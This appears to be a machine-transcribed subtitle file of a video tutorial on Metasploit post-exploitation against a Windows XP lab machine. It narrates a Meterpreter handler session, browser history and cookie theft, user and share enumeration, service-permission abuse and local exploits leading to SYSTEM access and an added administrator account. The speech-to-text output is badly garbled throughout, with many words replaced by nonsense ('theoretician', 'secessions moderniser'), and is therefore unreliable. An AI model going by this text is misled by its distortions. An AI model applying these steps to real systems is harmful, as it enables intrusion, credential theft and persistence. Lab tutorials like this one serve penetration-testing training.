1
00:00:02,820 --> 00:00:05,280
So this year, we're going to see some explode.

2
00:00:05,460 --> 00:00:11,700
Dues to the post expectation juice after getting a session, you can use these margins for much more

3
00:00:11,700 --> 00:00:16,050
information and get the highly privileged and theoretician.

4
00:00:16,770 --> 00:00:21,150
So first thing I have created matter better.

5
00:00:21,450 --> 00:00:23,610
Uh, the is better.

6
00:00:23,970 --> 00:00:25,350
And you can see the name here.

7
00:00:25,350 --> 00:00:25,910
Better, better.

8
00:00:26,100 --> 00:00:29,420
And it will come to this, uh, better.

9
00:00:30,390 --> 00:00:34,890
We need to use this multi use exploit multi.

10
00:00:37,720 --> 00:00:45,850
And if I show up, since I have already said these options, you need to set the right set pelote.

11
00:00:49,810 --> 00:00:52,090
Windows may interpretor.

12
00:01:02,870 --> 00:01:04,070
And to underscore this.

13
00:01:08,900 --> 00:01:14,660
So first, the options I have already said the solution, the report that is Macala next IP address

14
00:01:14,660 --> 00:01:16,120
and phone number.

15
00:01:16,880 --> 00:01:18,380
So let's go ahead and run this.

16
00:01:24,310 --> 00:01:26,980
So now you're going to execute this one.

17
00:01:29,150 --> 00:01:32,780
So there is a major transition for open secessions, minister.

18
00:01:36,790 --> 00:01:38,580
So, OK, let me back on this one.

19
00:01:39,300 --> 00:01:40,360
Secessions moderniser.

20
00:01:45,130 --> 00:01:53,570
So I have already, uh, that wants to make sure that we got the I said, let me do this for Tom.

21
00:01:55,060 --> 00:02:01,670
Sessions miners care for, so it's not a problem.

22
00:02:02,800 --> 00:02:10,800
So we have only one metaphysician that is, uh, that is just a user experience.

23
00:02:10,850 --> 00:02:11,230
Great.

24
00:02:11,470 --> 00:02:18,040
So we are going to check out some modules, uh, Freshway, to check whether it is running on the television

25
00:02:18,040 --> 00:02:18,320
or not.

26
00:02:18,340 --> 00:02:21,170
That is my experience on the machine or not.

27
00:02:21,760 --> 00:02:28,520
We can also, uh, previous previous comments I you this coming forward for another basic basic comments.

28
00:02:29,050 --> 00:02:36,030
So let me, uh, said G so let me first set the session two one.

29
00:02:36,250 --> 00:02:40,510
So this pushed expedition modules will work with the station.

30
00:02:40,510 --> 00:02:45,370
No, if I said this as a grabber, you don't need to worry about this decision to one.

31
00:02:45,370 --> 00:02:50,770
As a rule, I know we are going to set for your such.

32
00:02:52,480 --> 00:03:02,170
Jacqui, so we had the rain and wind, so we are going to use this no social use to and display the

33
00:03:02,170 --> 00:03:02,850
options.

34
00:03:04,150 --> 00:03:06,500
So we already had this one, right.

35
00:03:06,550 --> 00:03:10,390
I know we need to just run this model.

36
00:03:12,310 --> 00:03:18,920
So this is what the Bush expedition so expect is a virtual machine.

37
00:03:19,240 --> 00:03:21,460
So, OK, that's important.

38
00:03:21,680 --> 00:03:25,630
If you want to run some Marberry, you need to check.

39
00:03:25,630 --> 00:03:29,910
But Marberry has the Veum escape capacity or not.

40
00:03:29,920 --> 00:03:34,990
So you can check that, uh, because we know that it is virtual machine.

41
00:03:36,680 --> 00:03:42,270
So now we can enumerate this Internet Explorer and the chrome.

42
00:03:42,970 --> 00:03:48,460
So before that, let me, uh, display this item applications.

43
00:03:49,090 --> 00:03:50,140
So the search for.

44
00:03:53,160 --> 00:04:00,060
You know, applications are not there to enumerate all the applications are software that has been installed

45
00:04:00,060 --> 00:04:04,310
on this XP machine, Krekar type used, you know, and showed options.

46
00:04:05,610 --> 00:04:10,850
So basically the options for this person expired emergency session.

47
00:04:11,300 --> 00:04:12,720
I know that.

48
00:04:12,730 --> 00:04:13,620
Simply run this.

49
00:04:17,400 --> 00:04:26,190
And you can see all of this all started on this one recent update, and we have tools and Vincey Vinci

50
00:04:26,220 --> 00:04:28,950
software has been installed and Windows eight.

51
00:04:29,070 --> 00:04:32,270
So you can take this extra read version and look for experts.

52
00:04:32,820 --> 00:04:34,650
So there are some security updates.

53
00:04:35,310 --> 00:04:42,270
And the Python two point seven has been installed and C++, the date has been installed and Chrome and

54
00:04:42,270 --> 00:04:44,010
backplane Proposition 2.0.

55
00:04:44,160 --> 00:04:52,080
So you can just Google for this particular interface to went on to exploit and does so basically, even

56
00:04:52,080 --> 00:04:53,600
if you run that, you will get the basics.

57
00:04:53,910 --> 00:05:03,390
But I'm just showing you the enumeration of these applications and you need to see such, i.e. to get

58
00:05:03,390 --> 00:05:09,250
some information about the Internet Explorer if you have already credentials that use the euro.

59
00:05:09,540 --> 00:05:16,770
And so it's trying to retrieve the history and retrieving the cookies.

60
00:05:20,340 --> 00:05:28,050
So rewriting history to look that in this one, let's copy this and say Saikat.

61
00:05:32,450 --> 00:05:35,160
So they modified detectors and you are.

62
00:05:35,180 --> 00:05:42,400
So how is this Google Microsoft Web site and also I open it actually not open a but I don't know, it's

63
00:05:42,400 --> 00:05:43,070
sovereign in this.

64
00:05:43,500 --> 00:05:44,720
Are you showing in this history?

65
00:05:45,530 --> 00:05:47,440
So how do I know that this comes at a party?

66
00:05:47,750 --> 00:05:48,410
Yes, it does.

67
00:05:48,410 --> 00:05:51,640
Showed me the, uh, history of the Web browser.

68
00:05:52,100 --> 00:05:53,720
So there is no chrome.

69
00:05:53,720 --> 00:06:00,820
I think I do not use Chrome that much so that you and you use this model and you mind, you know, on

70
00:06:00,830 --> 00:06:01,490
the chrome.

71
00:06:02,330 --> 00:06:07,820
So you can also check for as an MP, strings are reaching.

72
00:06:07,830 --> 00:06:09,760
So that search further.

73
00:06:10,220 --> 00:06:13,610
So I'm not in sure on my experience in.

74
00:06:15,750 --> 00:06:20,960
Anyway, we will use that use General and Ron.

75
00:06:24,050 --> 00:06:30,690
So this is not an Internet threat, so we cannot lose that, so next we can enumerate the shares.

76
00:06:32,390 --> 00:06:33,020
Such.

77
00:06:43,960 --> 00:06:50,970
So in order to run this sonographer for there are no photographs that are being shown and also to dress,

78
00:06:51,280 --> 00:06:55,090
so now you can just use this, you don't want to lock down users.

79
00:06:55,340 --> 00:06:57,910
So to tell you are the users that are logged on.

80
00:07:00,460 --> 00:07:04,070
Or it will just sometimes it will tell you the whole of.

81
00:07:07,710 --> 00:07:13,770
So I'm going to use this Girot, that is the exploit and that is moderate's run this.

82
00:07:16,190 --> 00:07:23,260
So the European users are, Nikkie, currently logged on and recently returning to this one, Nikkie,

83
00:07:23,840 --> 00:07:27,470
and 10 minute or so in the previous year, we are logged in as Terminator.

84
00:07:28,160 --> 00:07:31,430
So that, uh, user has also been shown.

85
00:07:33,460 --> 00:07:40,300
And the next one is, uh, GPP, uh, this is a group policy preferences, there are really settings

86
00:07:40,300 --> 00:07:41,740
that are user.

87
00:07:41,740 --> 00:07:45,810
Then we can get those settings or exploit windows.

88
00:07:46,330 --> 00:07:49,570
So the street this is a push module for exploration module.

89
00:07:51,430 --> 00:07:52,430
And let's run this.

90
00:07:53,980 --> 00:08:03,070
So I did not even this these settings are not, uh, I did not just, uh, put any settings out, this

91
00:08:03,070 --> 00:08:11,140
local group policy so does not get any information if you if you are quoting inaccurate enrollment and

92
00:08:11,140 --> 00:08:12,790
then you get some information.

93
00:08:14,530 --> 00:08:21,160
And then if these service permissions got exposed, so let's see the service permissions.

94
00:08:25,330 --> 00:08:31,120
So this will restart the service operations and it will enumerate and even if there are any permissions

95
00:08:31,120 --> 00:08:36,850
already, writable services and then it will upload the service, it will create a service and get the

96
00:08:36,850 --> 00:08:37,950
reverser back to us.

97
00:08:42,170 --> 00:08:43,460
So let's use this one.

98
00:08:46,160 --> 00:08:57,020
So it's sort of on this, so as you can see, it's also using those underscore PXP module because if

99
00:08:57,410 --> 00:09:04,190
there is an misconfiguration, it will automatically upload this to us on cortizone DCP and get special

100
00:09:04,340 --> 00:09:07,260
to, as you can see here, retrocession for you open.

101
00:09:08,000 --> 00:09:09,950
Now, this is a system materialisation.

102
00:09:10,160 --> 00:09:20,150
So if you go back and secessions list for these decisions, I will get the section I identified as A.R.T.

103
00:09:20,150 --> 00:09:28,520
System so you can add the user, uh, normal, a fake user and added to Rugrat Michelago.

104
00:09:28,670 --> 00:09:31,790
So this is the Heidi Piringer commercial.

105
00:09:34,130 --> 00:09:42,710
So you can just get the shell using this shell come in from the better you can at the normal Windows

106
00:09:42,710 --> 00:09:45,420
Command Center, it's going to kill this one.

107
00:09:47,390 --> 00:09:48,620
So next one is local.

108
00:09:48,620 --> 00:09:54,380
Express a search for local underscore exploit.

109
00:09:56,420 --> 00:10:01,840
So we to you zero and will display the options.

110
00:10:04,570 --> 00:10:06,200
So we need to just run this one.

111
00:10:06,220 --> 00:10:12,330
You can also set this description variable to try to see in detailed explanation.

112
00:10:13,030 --> 00:10:14,050
This Destrehan.

113
00:10:16,170 --> 00:10:20,960
So it's collecting experts for a data between us and it may take some time.

114
00:10:54,490 --> 00:11:02,620
So it's saying that takes place, checks are being paid and it's being tried, these exploits and services

115
00:11:02,620 --> 00:11:03,950
running, but could not be good.

116
00:11:04,840 --> 00:11:07,240
I can see the description here.

117
00:11:07,270 --> 00:11:09,260
The target appears to be vulnerable to this.

118
00:11:09,550 --> 00:11:10,390
These two experts.

119
00:11:10,690 --> 00:11:11,980
So let's compare this one.

120
00:11:14,160 --> 00:11:24,150
And let's say you wash and paste this pot here and let said show me the options and it's using this

121
00:11:24,150 --> 00:11:29,160
resources so the expertise successful will get the results back to us.

122
00:11:29,310 --> 00:11:30,270
So let's run this.

123
00:11:33,240 --> 00:11:43,950
So expert has been in there and we got the shall for, say, CBG and Sessions minus my Nessel, and

124
00:11:43,950 --> 00:11:50,850
we get the A.R.T. systems so you can execute the, uh, comments there.

125
00:11:50,880 --> 00:11:58,200
As a result, we can add the figure going to the user and fake user and then added that user to that

126
00:11:59,040 --> 00:11:59,280
group.

127
00:12:00,240 --> 00:12:06,900
So these are all about these matters where you can just simply run those and get the highly approval.

128
00:12:07,380 --> 00:12:12,440
You can ask this just using this post exploration modules.

129
00:12:13,710 --> 00:12:20,550
So we have already seen this push exploitation, but this is about only this business related post expedition

130
00:12:20,550 --> 00:12:23,990
to get the, uh, to create our Prius.

131
00:12:24,660 --> 00:12:28,430
So you just try this and you get used to it.

132
00:12:29,070 --> 00:12:34,870
So that's how far this year I hope you understood this one prescription using my mother's.